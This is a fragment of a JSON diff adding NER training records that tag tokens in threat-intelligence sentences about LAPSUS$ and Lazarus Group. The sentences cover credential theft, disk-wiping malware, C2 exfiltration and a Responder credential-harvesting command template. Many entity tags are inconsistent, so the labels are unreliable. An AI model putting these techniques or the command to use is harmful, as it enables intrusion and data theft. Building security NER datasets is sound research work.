"O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "leverage", + "NordVPN", + "for", + "its", + "egress", + "points", + "when", + "targeting", + "intended", + "victims." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "purchased", + "credentials", + "and", + "session", + "tokens", + "from", + "criminal", + "underground", + "forums." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "shut", + "down", + "virtual", + "machines", + "from", + "within", + "a", + "victim's", + "on-premise", + "VMware", + "ESXi", + "infrastructure." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "searched", + "a", + "victim's", + "network", + "for", + "collaboration", + "platforms", + "like", + "SharePoint", + "to", + "discover", + "further", + "high-privilege", + "account", + "credentials." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "called", + "victims'", + "help", + "desk", + "to", + "convince", + "the", + "support", + "personnel", + "to", + "reset", + "a", + "privileged", + "account’s", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "obtained", + "tools", + "such", + "as", + "RVTools", + "and", + "AD", + "Explorer", + "for", + "their", + "operations." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "accessed", + "internet-facing", + "identity", + "providers", + "such", + "as", + "Azure", + "Active", + "Directory", + "and", + "Okta", + "to", + "target", + "specific", + "organizations." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Org", + "I-Org", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "O", + "O", + "I-Org", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "recruited", + "target", + "organization", + "employees", + "or", + "contractors", + "who", + "provide", + "credentials", + "and", + "approve", + "an", + "associated", + "MFA", + "prompt,", + "or", + "install", + "remote", + "management", + "software", + "onto", + "a", + "corporate", + "workstation,", + "allowing", + "LAPSUS$", + "to", + "take", + "control", + "of", + "an", + "authenticated", + "system." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "I-Org", + "I-Org", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "used", + "compromised", + "credentials", + "and/or", + "session", + "tokens", + "to", + "gain", + "access", + "into", + "a", + "victim's", + "VPN,", + "VDI,", + "RDP,", + "and", + "IAMs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "I-Tool", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "used", + "VPS", + "hosting", + "providers", + "for", + "infrastructure." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "malware", + "WhiskeyDelta-Two", + "contains", + "a", + "function", + "that", + "attempts", + "to", + "rename", + "the", + "administrator’s", + "account." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "malware", + "IndiaIndia", + "obtains", + "and", + "sends", + "to", + "its", + "C2", + "server", + "the", + "title", + "of", + "the", + "window", + "for", + "each", + "running", + "process.", + "The", + "KilaAlfa", + "keylogger", + "also", + "reports", + "the", + "title", + "of", + "the", + "window", + "in", + "the", + "foreground." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "compressed", + "exfiltrated", + "data", + "with", + "RAR", + "and", + "used", + "RomeoDelta", + "malware", + "to", + "archive", + "specified", + "directories", + "in", + ".zip", + "format,", + "encrypt", + "the", + ".zip", + "file,", + "and", + "upload", + "it", + "to", + "C2." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "Lazarus", + "Group", + "malware", + "sample", + "encrypts", + "data", + "using", + "a", + "simple", + "byte", + "based", + "XOR", + "operation", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "malware", + "IndiaIndia", + "saves", + "information", + "gathered", + "about", + "the", + "victim", + "to", + "a", + "file", + "that", + "is", + "compressed", + "with", + "Zlib,", + "encrypted,", + "and", + "uploaded", + "to", + "a", + "C2", + "server." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "used", + "GitHub", + "as", + "C2,", + "pulling", + "hosted", + "image", + "payloads", + "then", + "committing", + "command", + "execution", + "output", + "to", + "files", + "in", + "specific", + "directories." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "malware", + "WhiskeyAlfa-Three", + "modifies", + "sector", + "0", + "of", + "the", + "Master", + "Boot", + "Record", + "(MBR)", + "to", + "ensure", + "that", + "the", + "malware", + "will", + "persist", + "even", + "if", + "a", + "victim", + "machine", + "shuts", + "down." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "routinely", + "deleted", + "log", + "files", + "on", + "a", + "compromised", + "router,", + "including", + "automatic", + "log", + "deletion", + "through", + "the", + "use", + "of", + "the", + "logrotate", + "utility." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-OffAct", + "B-Way", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "digitally", + "signed", + "malware", + "and", + "utilities", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "keylogger", + "KiloAlfa", + "obtains", + "user", + "tokens", + "from", + "interactive", + "sessions", + "to", + "execute", + "itself", + "with", + "API", + "call", + "<code>CreateProcessAsUserA</code>", + "under", + "that", + "user's", + "context." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "replaced", + "`win_fw.dll`,", + "an", + "internal", + "component", + "that", + "is", + "executed", + "during", + "IDA", + "Pro", + "installation,", + "with", + "a", + "malicious", + "DLL", + "to", + "download", + "and", + "execute", + "a", + "payload." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "used", + "a", + "custom", + "secure", + "delete", + "function", + "to", + "overwrite", + "file", + "contents", + "with", + "data", + "from", + "heap", + "memory." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "collected", + "data", + "and", + "files", + "from", + "compromised", + "networks." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "used", + "shellcode", + "within", + "macros", + "to", + "decrypt", + "and", + "manually", + "map", + "DLLs", + "and", + "shellcode", + "into", + "memory", + "at", + "runtime." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "obtained", + "SSL", + "certificates", + "for", + "their", + "C2", + "domains." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Various", + "Lazarus", + "Group", + "malware", + "modifies", + "the", + "Windows", + "firewall", + "to", + "allow", + "incoming", + "connections", + "or", + "disable", + "it", + "entirely", + "using", + "netsh." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "malware", + "TangoDelta", + "attempts", + "to", + "terminate", + "various", + "processes", + "associated", + "with", + "McAfee.", + "Additionally,", + "Lazarus", + "Group", + "malware", + "SHARPKNOT", + "disables", + "the", + "Microsoft", + "Windows", + "System", + "Event", + "Notification", + "and", + "Alerter", + "services.." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "used", + "malware", + "like", + "WhiskeyAlfa", + "to", + "overwrite", + "the", + "first", + "64MB", + "of", + "every", + "drive", + "with", + "a", + "mix", + "of", + "static", + "and", + "random", + "buffers.", + "A", + "similar", + "process", + "is", + "then", + "used", + "to", + "wipe", + "content", + "in", + "logical", + "drives", + "and,", + "finally,", + "attempt", + "to", + "wipe", + "every", + "byte", + "of", + "every", + "sector", + "on", + "every", + "drive.", + "WhiskeyBravo", + "can", + "be", + "used", + "to", + "overwrite", + "the", + "first", + "4.9MB", + "of", + "physical", + "drives.", + "WhiskeyDelta", + "can", + "overwrite", + "the", + "first", + "132MB", + "or", + "1.5MB", + "of", + "each", + "drive", + "with", + "random", + "data", + "from", + "heap", + "memory." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "malware", + "SHARPKNOT", + "overwrites", + "and", + "deletes", + "the", + "Master", + "Boot", + "Record", + "(MBR)", + "on", + "the", + "victim's", + "machine", + "and", + "has", + "possessed", + "MBR", + "wiper", + "malware", + "since", + "at", + "least", + "2009." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "acquired", + "domains", + "related", + "to", + "their", + "campaigns", + "to", + "act", + "as", + "distribution", + "points", + "and", + "C2", + "channels." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "delivered", + "RATANKBA", + "and", + "other", + "malicious", + "code", + "to", + "victims", + "via", + "a", + "compromised", + "legitimate", + "website." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "used", + "a", + "custom", + "hashing", + "method", + "to", + "resolve", + "APIs", + "used", + "in", + "shellcode." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "Lazarus", + "Group", + "malware", + "sample", + "performs", + "reflective", + "DLL", + "injection." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "I-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "created", + "new", + "email", + "accounts", + "for", + "spearphishing", + "operations." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "collected", + "email", + "addresses", + "belonging", + "to", + "various", + "departments", + "of", + "a", + "targeted", + "organization", + "which", + "were", + "used", + "in", + "follow-on", + "phishing", + "campaigns." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "used", + "multiple", + "types", + "of", + "encryption", + "and", + "encoding", + "for", + "their", + "payloads,", + "including", + "AES,", + "Caracachs,", + "RC4,", + "XOR,", + "Base64,", + "and", + "other", + "tricks", + "such", + "as", + "creating", + "aliases", + "in", + "code", + "for", + "Native", + "API", + "function", + "names." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "exfiltrated", + "data", + "and", + "files", + "over", + "a", + "C2", + "channel", + "through", + "its", + "various", + "tools", + "and", + "malware." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "malware", + "SierraBravo-Two", + "generates", + "an", + "email", + "message", + "via", + "SMTP", + "containing", + "information", + "about", + "newly", + "infected", + "victims." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "exploited", + "Adobe", + "Flash", + "vulnerability", + "CVE-2018-4878", + "for", + "execution." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "I-Exp", + "I-Exp", + "I-Exp", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "used", + "multiple", + "proxies", + "to", + "obfuscate", + "network", + "traffic", + "from", + "victims." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "malware", + "SierraAlfa", + "sends", + "data", + "to", + "one", + "of", + "the", + "hard-coded", + "C2", + "servers", + "chosen", + "at", + "random,", + "and", + "if", + "the", + "transmission", + "fails,", + "chooses", + "a", + "new", + "C2", + "server", + "to", + "attempt", + "the", + "transmission", + "again." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "malware", + "has", + "deleted", + "files", + "in", + "various", + "ways,", + "including", + "\"suicide", + "scripts\"", + "to", + "delete", + "malware", + "binaries", + "from", + "the", + "victim.", + "Lazarus", + "Group", + "also", + "uses", + "secure", + "file", + "deletion", + "to", + "delete", + "files", + "from", + "the", + "victim." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "malware", + "can", + "use", + "a", + "common", + "function", + "to", + "identify", + "target", + "files", + "by", + "their", + "extension,", + "and", + "some", + "also", + "enumerate", + "files", + "and", + "directories,", + "including", + "a", + "Destover-like", + "variant", + "that", + "lists", + "files", + "and", + "gathers", + "information", + "for", + "all", + "drives." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "studied", + "publicly", + "available", + "information", + "about", + "a", + "targeted", + "organization", + "to", + "tailor", + "spearphishing", + "efforts", + "against", + "specific", + "departments", + "and/or", + "individuals." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "used", + "a", + "VBA", + "Macro", + "to", + "set", + "its", + "file", + "attributes", + "to", + "System", + "and", + "Hidden", + "and", + "has", + "named", + "files", + "with", + "a", + "dot", + "prefix", + "to", + "hide", + "them", + "from", + "the", + "Finder", + "application." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "restored", + "malicious", + "KernelCallbackTable", + "code", + "to", + "its", + "original", + "state", + "after", + "the", + "process", + "execution", + "flow", + "has", + "been", + "hijacked." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "persistence", + "mechanisms", + "have", + "used", + "<code>forfiles.exe</code>", + "to", + "execute", + ".htm", + "files." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "downloaded", + "files,", + "malware,", + "and", + "tools", + "from", + "its", + "C2", + "onto", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "replaced", + "the", + "background", + "wallpaper", + "of", + "systems", + "with", + "a", + "threatening", + "image", + "after", + "rendering", + "the", + "system", + "unbootable", + "with", + "a", + "Disk", + "Structure", + "Wipe." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "used", + "a", + "compromised", + "router", + "to", + "serve", + "as", + "a", + "proxy", + "between", + "a", + "victim", + "network's", + "corporate", + "and", + "restricted", + "segments." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "abused", + "the", + "<code>KernelCallbackTable</code>", + "to", + "hijack", + "process", + "control", + "flow", + "and", + "execute", + "shellcode." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "malware", + "KiloAlfa", + "contains", + "keylogging", + "functionality." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "executed", + "Responder", + "using", + "the", + "command", + "<code>[Responder", + "file", + "path]", + "-i", + "[IP", + "address]", + "-rPv</code>", + "on", + "a", + "compromised", + "host", + "to", + "harvest", + "credentials", + "and", + "move", + "laterally." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "malware", + "IndiaIndia", + "saves", + "information", + "gathered", + "about", + "the", + "victim", + "to", + "a", + "file", + "that", + "is", + "saved", + "in", + "the", + "%TEMP%", + "directory,", + "then", + "compressed,", + "encrypted,", + "and", + "uploaded", + "to", + "a", + "C2", + "server." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "attempted", + "to", + "get", + "users", + "to", + "launch", + "a", + "malicious", + "Microsoft", + "Word", + "attachment", + "delivered", + "via", + "a", + "spearphishing", + "email." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "developed", + "custom", + "malware", + "for", + "use", + "in", + "their", + "operations." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "used", + "a", + "scheduled", + "task", + "named", + "`SRCheck`", + "to", + "mask", + "the", + "execution", + "of", + "a", + "malicious", + ".dll." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "renamed", + "malicious", + "code", + "to", + "disguise", + "it", + "as", + "Microsoft's", + "narrator", + "and", + "other", + "legitimate", + "files." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "used", + "<code>mshta.exe</code>", + "to", + "execute", + "HTML", + "pages", + "downloaded", + "by", + "initial", + "access", + "documents." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "used", + "multi-stage", + "malware", + "components", + "that", + "inject", + "later", + "stages", + "into", + "separate", + "processes." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "used", + "the", + "Windows", + "API", + "<code>ObtainUserAgentString</code>", + "to", + "obtain", + "the", + "User-Agent", + "from", + "a", + "compromised", + "host", + "to", + "connect", + "to", + "a", + "C2", + "server.", + "Lazarus", + "Group", + "has", + "also", + "used", + "various,", + "often", + "lesser", + "known,", + "functions", + "to", + "perform", + "various", + "types", + "of", + "Discovery", + "and", + "Process", + "Injection." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "used", + "nmap", + "from", + "a", + "router", + "VM", + "to", + "scan", + "ports", + "on", + "systems", + "within", + "the", + "restricted", + "segment", + "of", + "an", + "enterprise", + "network." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "Lazarus", + "Group", + "malware", + "uses", + "a", + "list", + "of", + "ordered", + "port", + "numbers", + "to", + "choose", + "a", + "port", + "for", + "C2", + "traffic,", + "creating", + "port-protocol", + "mismatches." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "malware", + "attempts", + "to", + "connect", + "to", + "Windows", + "shares", + "for", + "lateral", + "movement", + "by", + "using", + "a", + "generated", + "list", + "of", + "usernames,", + "which", + "center", + "around", + "permutations", + "of", + "the", + "username", + "Administrator,", + "and", + "weak", + "passwords." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + 